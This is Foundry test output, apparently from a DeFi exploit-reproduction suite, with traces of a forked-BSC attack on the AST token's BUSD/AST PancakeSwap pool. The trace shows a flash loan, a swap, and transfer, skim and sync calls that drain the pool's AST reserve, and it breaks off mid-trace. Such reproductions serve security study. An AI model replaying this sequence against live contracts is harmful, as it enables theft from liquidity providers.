Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.27s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2025-01/Ast_exp.sol:68:51:
   |
68 |     function pancakeV3FlashCallback(uint256 fee0, uint256 fee1, bytes memory data) external {
   |                                                   ^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 568.76ms (1.83ms CPU time)

Ran 1 test for src/test/2025-01/Ast_exp.sol:ContractTest
[PASS] testExploit() (gas: 370947)
Logs:
  [Start] Attacker BUSD balance before flash: 1.000000000000000000
  [Info] Attacker BUSD balance after flash: 30000001.000000000000000000
  [Info] LP BUSD balance after skim: 30080145.197852789777147003
  [Info] LP AST balance after skim: 0.000000000000000001
  [Info] Attacker BUSD balance after exploit: 65146.197852789676322046

Traces:
  [533544] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 45964639 [4.596e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(BUSD: [0x55d398326f99059fF775485246999027B3197955], "BUSD")
    │   └─ ← [Return]
    ├─ [0] VM::label(AST: [0xc10E0319337c7F83342424Df72e73a70A29579B2], "AST")
    │   └─ ← [Return]
    ├─ [0] VM::label(BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a], "BUSD_AST_LPPool")
    │   └─ ← [Return]
    ├─ [0] VM::label(PancakePool: [0x36696169C63e42cd08ce11f5deeBbCeBae652050], "PancakePool")
    │   └─ ← [Return]
    ├─ [0] VM::label(pancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], "pancakeRouter")
    │   └─ ← [Return]
    ├─ [0] VM::label(ERC1967Proxy: [0xc8B9817eB65B7d7e85325f23A60D5839d14F9Ce4], "ERC1967Proxy")
    │   └─ ← [Return]
    ├─ [2531] BUSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26542161622221038197 [2.654e19]
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [531] BUSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26542161622221038197 [2.654e19]
    ├─ [0] VM::accesses(BUSD: [0x55d398326f99059fF775485246999027B3197955])
    │   └─ ← [Return] [0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96], []
    ├─ [0] VM::load(BUSD: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000017058b35e777da275
    ├─ [0] VM::load(BUSD: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000017058b35e777da275
    ├─ [531] BUSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26542161622221038197 [2.654e19]
    ├─ [0] VM::store(BUSD: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ [531] BUSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(BUSD: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000017058b35e777da275)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: BUSD: [0x55d398326f99059fF775485246999027B3197955], fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 81201235000773904770131445719184449197250777359516868712991521815545917127830 [8.12e76])
    ├─ [0] VM::load(BUSD: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000017058b35e777da275
    ├─ [0] VM::store(BUSD: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000)
    │   └─ ← [Return]
    ├─ [531] BUSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 1000000000000000000 [1e18]
    ├─ [2617] AST::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [617] AST::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::accesses(AST: [0xc10E0319337c7F83342424Df72e73a70A29579B2])
    │   └─ ← [Return] [0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96], []
    ├─ [0] VM::load(AST: [0xc10E0319337c7F83342424Df72e73a70A29579B2], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ emit WARNING_UninitedSlot(who: AST: [0xc10E0319337c7F83342424Df72e73a70A29579B2], slot: 81201235000773904770131445719184449197250777359516868712991521815545917127830 [8.12e76])
    ├─ [0] VM::load(AST: [0xc10E0319337c7F83342424Df72e73a70A29579B2], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [617] AST::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(AST: [0xc10E0319337c7F83342424Df72e73a70A29579B2], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff)
    │   └─ ← [Return]
    ├─ [617] AST::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    ├─ [0] VM::store(AST: [0xc10E0319337c7F83342424Df72e73a70A29579B2], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: AST: [0xc10E0319337c7F83342424Df72e73a70A29579B2], fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 81201235000773904770131445719184449197250777359516868712991521815545917127830 [8.12e76])
    ├─ [0] VM::load(AST: [0xc10E0319337c7F83342424Df72e73a70A29579B2], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [0] VM::store(AST: [0xc10E0319337c7F83342424Df72e73a70A29579B2], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000006124fee993bc0000)
    │   └─ ← [Return]
    ├─ [617] AST::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 7000000000000000000 [7e18]
    └─ ← [Stop]

  [415247] ContractTest::testExploit()
    ├─ [2531] BUSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 1000000000000000000 [1e18]
    ├─ emit log_named_decimal_uint(key: "[Start] Attacker BUSD balance before flash", val: 1000000000000000000 [1e18], decimals: 18)
    ├─ [396291] PancakePool::flash(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 30000000000000000000000000 [3e25], 0, 0x00000000000000000000000000000000000000000018d0bf423c03d8de000000)
    │   ├─ [2531] BUSD::balanceOf(PancakePool: [0x36696169C63e42cd08ce11f5deeBbCeBae652050]) [staticcall]
    │   │   └─ ← [Return] 45653978301454109570680035 [4.565e25]
    │   ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(PancakePool: [0x36696169C63e42cd08ce11f5deeBbCeBae652050]) [staticcall]
    │   │   └─ ← [Return] 10174523019143306513145 [1.017e22]
    │   ├─ [8871] BUSD::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 30000000000000000000000000 [3e25])
    │   │   ├─ emit Transfer(from: PancakePool: [0x36696169C63e42cd08ce11f5deeBbCeBae652050], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 30000000000000000000000000 [3e25])
    │   │   ├─  storage changes:
    │   │   │   @ 0x4b4dfb61299ca62a744d1ae05c6e24e84740e94efd86eec09992191d35df35c4: 0x00000000000000000000000000000000000000000025c39b1f733cbe0432c4e3 → 0x0000000000000000000000000000000000000000000cf2dbdd3738e52632c4e3
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000 → 0x00000000000000000000000000000000000000000018d0bf501cba8c85640000
    │   │   └─ ← [Return] true
    │   ├─ [351521] ContractTest::pancakeV3FlashCallback(15000000000000000000000 [1.5e22], 0, 0x00000000000000000000000000000000000000000018d0bf423c03d8de000000)
    │   │   ├─ [531] BUSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 30000001000000000000000000 [3e25]
    │   │   ├─ emit log_named_decimal_uint(key: "[Info] Attacker BUSD balance after flash", val: 30000001000000000000000000 [3e25], decimals: 18)
    │   │   ├─ [24562] BUSD::approve(pancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: pancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [24663] AST::approve(pancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: pancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [24598] BUSD_AST_LPPool::approve(pancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: pancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [90928] pancakeRouter::swapExactTokensForTokensSupportingFeeOnTransferTokens(30000000000000000000000000 [3e25], 0, [0x55d398326f99059fF775485246999027B3197955, 0xc10E0319337c7F83342424Df72e73a70A29579B2], ERC1967Proxy: [0xc8B9817eB65B7d7e85325f23A60D5839d14F9Ce4], 1737475209 [1.737e9])
    │   │   │   ├─ [10834] BUSD::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a], 30000000000000000000000000 [3e25])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a], value: 30000000000000000000000000 [3e25])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: pancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640534039457584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000018d0bf501cba8c85640000 → 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000
    │   │   │   │   │   @ 0x9f3727c7d6768bd438e6df01d39fab30bb2722b9c54871ca1473e72b606ff7d7: 0x0000000000000000000000000000000000000000000010f8ae0cb3a7c620a47b → 0x00000000000000000000000000000000000000000018e1b7f048b780a420a47b
    │   │   │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffe72f40bdc3fc2721ffffff
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [2617] AST::balanceOf(ERC1967Proxy: [0xc8B9817eB65B7d7e85325f23A60D5839d14F9Ce4]) [staticcall]
    │   │   │   │   └─ ← [Return] 999943479132860518455 [9.999e20]
    │   │   │   ├─ [2893] BUSD_AST_LPPool::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 80145197852789777147003 [8.014e22], 2504016689690289439489 [2.504e21], 1737475164 [1.737e9]
    │   │   │   ├─ [531] BUSD::balanceOf(BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a]) [staticcall]
    │   │   │   │   └─ ← [Return] 30080145197852789777147003 [3.008e25]
    │   │   │   ├─ [66294] BUSD_AST_LPPool::swap(0, 2497328339685694985988 [2.497e21], ERC1967Proxy: [0xc8B9817eB65B7d7e85325f23A60D5839d14F9Ce4], 0x)
    │   │   │   │   ├─ [31834] AST::transfer(ERC1967Proxy: [0xc8B9817eB65B7d7e85325f23A60D5839d14F9Ce4], 2497328339685694985988 [2.497e21])
    │   │   │   │   │   ├─ emit Transfer(from: BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a], to: ERC1967Proxy: [0xc8B9817eB65B7d7e85325f23A60D5839d14F9Ce4], value: 2497328339685694985988 [2.497e21])
    │   │   │   │   │   ├─ [531] BUSD::balanceOf(BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 30080145197852789777147003 [3.008e25]
    │   │   │   │   │   ├─ emit LiquidityAdded(param0: BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a], param1: 30080145197852789777147003 [3.008e25])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x84c6bfa2b3c62dbba291a0f3757a96302e009e12ec22d489073b2c102d8849a7: 0x0000000000000000000000000000000000000000000000363500e057fe611037 → 0x0000000000000000000000000000000000000000000000bd96656de01048673b
    │   │   │   │   │   │   @ 5: 0x0000000000000000000000000000000000000000000010f8ae0cb3a7c620a47b → 0x00000000000000000000000000000000000000000018e1b7f048b780a420a47b
    │   │   │   │   │   │   @ 0x9f3727c7d6768bd438e6df01d39fab30bb2722b9c54871ca1473e72b606ff7d7: 0x000000000000000000000000000000000000000000000087be36586c9f3d0301 → 0x0000000000000000000000000000000000000000000000005cd1cae48d55abfd
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [531] BUSD::balanceOf(BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 30080145197852789777147003 [3.008e25]
    │   │   │   │   ├─ [617] AST::balanceOf(BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 6688350004594453501 [6.688e18]
    │   │   │   │   ├─ emit Sync(reserve0: 30080145197852789777147003 [3.008e25], reserve1: 6688350004594453501 [6.688e18])
    │   │   │   │   ├─ emit Swap(sender: pancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0In: 30000000000000000000000000 [3e25], amount1In: 0, amount0Out: 0, amount1Out: 2497328339685694985988 [2.497e21], to: ERC1967Proxy: [0xc8B9817eB65B7d7e85325f23A60D5839d14F9Ce4])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 9: 0x000000000000000000000000000000007a833060bf1b53f809d5a18f8fe13b6f → 0x000000000000000000000000000000007a84984d95a917ce12992a59cc182c6a
    │   │   │   │   │   @ 8: 0x678fc45c000000000087be36586c9f3d03010000000010f8ae0cb3a7c620a47b → 0x678fc4890000000000005cd1cae48d55abfd00000018e1b7f048b780a420a47b
    │   │   │   │   │   @ 10: 0x0000000000000000000000000000003ad1eacc8a60c3298bf613196d56b84d43 → 0x0000000000000000000000000000003ad78b19343e56900ca65c4b7032694ebf
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [617] AST::balanceOf(ERC1967Proxy: [0xc8B9817eB65B7d7e85325f23A60D5839d14F9Ce4]) [staticcall]
    │   │   │   │   └─ ← [Return] 3497271818818555504443 [3.497e21]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [617] AST::balanceOf(BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a]) [staticcall]
    │   │   │   └─ ← [Return] 6688350004594453501 [6.688e18]
    │   │   ├─ [6071] BUSD::transfer(BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a], 1000000000000000000 [1e18])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a], value: 1000000000000000000 [1e18])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x9f3727c7d6768bd438e6df01d39fab30bb2722b9c54871ca1473e72b606ff7d7: 0x00000000000000000000000000000000000000000018e1b7f048b780a420a47b → 0x00000000000000000000000000000000000000000018e1b7fe296e344b84a47b
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000 → 0
    │   │   │   └─ ← [Return] true
    │   │   ├─ [44212] AST::transfer(BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a], 6688350004594453500 [6.688e18])
    │   │   │   ├─ [531] BUSD::balanceOf(BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a]) [staticcall]
    │   │   │   │   └─ ← [Return] 30080146197852789777147003 [3.008e25]
    │   │   │   ├─ emit LiquidityAdded(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 30080145197852789777147003 [3.008e25])
    │   │   │   ├─ [2439] BUSD_AST_LPPool::totalSupply() [staticcall]
    │   │   │   │   └─ ← [Return] 14142135553020272192585 [1.414e22]
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a], value: 6688350004594453500 [6.688e18])
    │   │   │   ├─ [531] BUSD::balanceOf(BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a]) [staticcall]
    │   │   │   │   └─ ← [Return] 30080146197852789777147003 [3.008e25]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000006124fee993bc0000 → 0x0000000000000000000000000000000000000000000000000453340506665404
    │   │   │   │   @ 5: 0x00000000000000000000000000000000000000000018e1b7f048b780a420a47b → 0x00000000000000000000000000000000000000000018e1b7fe296e344b84a47b
    │   │   │   │   @ 0x9f3727c7d6768bd438e6df01d39fab30bb2722b9c54871ca1473e72b606ff7d7: 0x0000000000000000000000000000000000000000000000005cd1cae48d55abfd → 0x000000000000000000000000000000000000000000000000b9a395c91aab57f9
    │   │   │   │   @ 0x16102f891729262ce67210a124a159646f7714794acb4ed5a594ecb524124440: 0 → 0x0000000000000000000000000000000000000000000000000001ab0663457451
    │   │   │   └─ ← [Return] true
    │   │   ├─ [34852] BUSD_AST_LPPool::skim(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─ [531] BUSD::balanceOf(BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a]) [staticcall]
    │   │   │   │   └─ ← [Return] 30080146197852789777147003 [3.008e25]
    │   │   │   ├─ [3271] BUSD::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1000000000000000000 [1e18])
    │   │   │   │   ├─ emit Transfer(from: BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1000000000000000000 [1e18])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x9f3727c7d6768bd438e6df01d39fab30bb2722b9c54871ca1473e72b606ff7d7: 0x00000000000000000000000000000000000000000018e1b7fe296e344b84a47b → 0x00000000000000000000000000000000000000000018e1b7f048b780a420a47b
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [617] AST::balanceOf(BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a]) [staticcall]
    │   │   │   │   └─ ← [Return] 13376700009188907001 [1.337e19]
    │   │   │   ├─ [22966] AST::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 6688350004594453500 [6.688e18])
    │   │   │   │   ├─ [2537] BUSD_AST_LPPool::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ emit LiquidityRemoved(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 469518900360273 [4.695e14])
    │   │   │   │   ├─ emit Transfer(from: BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a], to: 0x0000000000000000000000000000000000000000, value: 6688350004594453500 [6.688e18])
    │   │   │   │   ├─ emit Transfer(from: BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   │   │   ├─ [531] BUSD::balanceOf(BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 30080145197852789777147003 [3.008e25]
    │   │   │   │   ├─ emit LiquidityAdded(param0: BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a], param1: 30080145197852789777147003 [3.008e25])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x16102f891729262ce67210a124a159646f7714794acb4ed5a594ecb524124440: 0x0000000000000000000000000000000000000000000000000001ab0663457451 → 0
    │   │   │   │   │   @ 6: 0x000000000000000000000000000000000000000000009e6f7a8135d4866d4b3f → 0x000000000000000000000000000000000000000000009e6f1daf6aeff9179f43
    │   │   │   │   │   @ 5: 0x00000000000000000000000000000000000000000018e1b7fe296e344b84a47b → 0x00000000000000000000000000000000000000000018e1b7f048b780a420a47b
    │   │   │   │   │   @ 0x9f3727c7d6768bd438e6df01d39fab30bb2722b9c54871ca1473e72b606ff7d7: 0x000000000000000000000000000000000000000000000000b9a395c91aab57f9 → 1
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000
    │   │   │   └─ ← [Stop]
    │   │   ├─ [9060] BUSD_AST_LPPool::sync()
    │   │   │   ├─ [531] BUSD::balanceOf(BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a]) [staticcall]
    │   │   │   │   └─ ← [Return] 30080145197852789777147003 [3.008e25]
    │   │   │   ├─ [617] AST::balanceOf(BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a]) [staticcall]
    │   │   │   │   └─ ← [Return] 1
    │   │   │   ├─ emit Sync(reserve0: 30080145197852789777147003 [3.008e25], reserve1: 1)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 8: 0x678fc4890000000000005cd1cae48d55abfd00000018e1b7f048b780a420a47b → 0x678fc489000000000000000000000000000100000018e1b7f048b780a420a47b
    │   │   │   └─ ← [Stop]
    │   │   ├─ [531] BUSD::balanceOf(BUSD_AST_LPPool: [0x5ffEc8523A42BE78B1Ad1244fA526f14B64bA47a]) [staticcall]
    │   │   │   └─ ← [Return] 30080145197852789777147003 [3.008e25]
